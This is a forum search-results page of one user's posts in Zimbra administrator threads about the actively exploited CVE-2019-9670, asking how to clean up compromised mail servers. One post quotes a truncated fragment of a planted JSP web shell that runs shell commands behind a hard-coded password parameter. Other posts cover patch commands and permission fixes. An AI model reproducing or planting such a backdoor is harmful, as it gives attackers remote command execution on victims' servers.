Search found 14 matches

by elby
Fri May 31, 2019 8:25 am
Forum: Administrators
Topic: CVE-2019-9670 being actively exploited
Replies: 248
Views: 226180

Re: CVE-2019-9670 being actively exploited

Help me with this plz : /opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp/Debug_jsp.java:if("lMIAb3JS-s7dPUDkAZA-O8INcT4vQWNQ_oILtGOGZLE".equals(request.getParameter("ppwd"))){java.io.InputStream in = Runtime.getRuntime().exec(new String[]{"/bin/sh","...
by elby
Fri May 31, 2019 7:40 am
Forum: Administrators
Topic: CVE-2019-9670 being actively exploited
Replies: 248
Views: 226180

Re: CVE-2019-9670 being actively exploited

The problem appeared again. Do you have these folders? /opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp with: /opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp/Debug_jsp.class /opt/zimbra/mailboxd/work/zimbraAdmin/org/apache/jsp/public_/jsp/Debug_jsp.java and /opt/zimb...
by elby
Thu May 30, 2019 11:48 am
Forum: Administrators
Topic: Zimbra AJAX Webmail not loading
Replies: 126
Views: 40179

Re: Zimbra AJAX Webmail not loading

I have my zimbra 8.6 with the last patch I that I downloaded from ZImbras site, patch 14. My OS is Redhat 6.6. The servers is pattched but what can I do to remove this script? Thanks for any help. Thanks to Drake for support :) Zimbra 8.6.0 GA Network Editions , CentOS 6.6 Patch Zimbra : wget https...
by elby
Thu May 30, 2019 7:45 am
Forum: Administrators
Topic: CVE-2019-9670 being actively exploited
Replies: 248
Views: 226180

Re: CVE-2019-9670 being actively exploited

Thanks to Drake for support :) Zimbra 8.6.0 GA Network Editions , CentOS 6.6 Patch Zimbra : wget https://files.zimbra.com/downloads/8.6.0_GA/zcs-patch-8.6.0_GA_1242.tgz tar xzf zcs-patch-8.6.0_GA_1242.tgz cd /tar xzf zcs-patch-8.6.0_GA_1242 Delete global admin accounts Change password # Zimbra AJAX...
by elby
Wed May 29, 2019 2:38 pm
Forum: Administrators
Topic: CVE-2019-9670 being actively exploited
Replies: 248
Views: 226180

Re: CVE-2019-9670 being actively exploited

How do I extract the original files from the installation source to replace the infected files with them? Under Windows.


Zimbra 8.6.0_GA Network Editions

edit: https://www.altap.cz/salamander/feature ... r-windows/
by elby
Wed May 29, 2019 10:45 am
Forum: Administrators
Topic: Zimbra AJAX Webmail not loading
Replies: 126
Views: 40179

Re: Zimbra AJAX Webmail not loading

Ignat wrote:i hava a same problem with server . i founded many global admin accounts in users newly created


How to list/ view global admin accounts?


How to create and Admin account
by elby
Wed May 29, 2019 8:32 am
Forum: Administrators
Topic: CVE-2019-9670 being actively exploited
Replies: 248
Views: 226180

Re: CVE-2019-9670 being actively exploited

I find this: ==== /opt/zimbra/libexec/600.zimbra:if [ -f /opt/zimbra/log/swatch.pid ]; then echo "Restarting zmswatch"; $SU "/opt/zimbra/bin/zmswatchctl reload"; fi /opt/zimbra/libexec/zmrcd: "start snmp" => "/opt/zimbra/bin/zmswatchctl start", /opt/zimbra/lib...
by elby
Tue May 28, 2019 10:56 am
Forum: Administrators
Topic: CVE-2019-9670 being actively exploited
Replies: 248
Views: 226180

Re: CVE-2019-9670 being actively exploited

I did not express myself correctly.
Everything from my crontab was removed - only one line left to start exploit.
by elby
Tue May 28, 2019 10:25 am
Forum: Administrators
Topic: CVE-2019-9670 being actively exploited
Replies: 248
Views: 226180

Re: CVE-2019-9670 being actively exploited

zimbraxtc wrote:
Drake wrote:Hello guys


Thanks!

Dont miss:
/opt/zimbra/log/zmswatch and zmswatch.sh


This is a zimbra files or exploit ?

My crontab is empty. How can i regenerate it?
by elby
Tue May 28, 2019 9:57 am
Forum: Administrators
Topic: Zimbra AJAX Webmail not loading
Replies: 126
Views: 40179

Re: Zimbra AJAX Webmail not loading

I totally went wrong :( [zimbra@mail ~]$ zmcontrol -v Release 8.6.0_GA_1153.RHEL6_64_20141215151258 RHEL6_64 NETWORK edition. I did the following (as root); cd /opt/zimbra/mailboxd find webapps -type d -exec chmod 0755 {} \; find webapps -type f -exec chmod 0644 {} \; Then restart Zimbra; su - zimbr...

Go to advanced search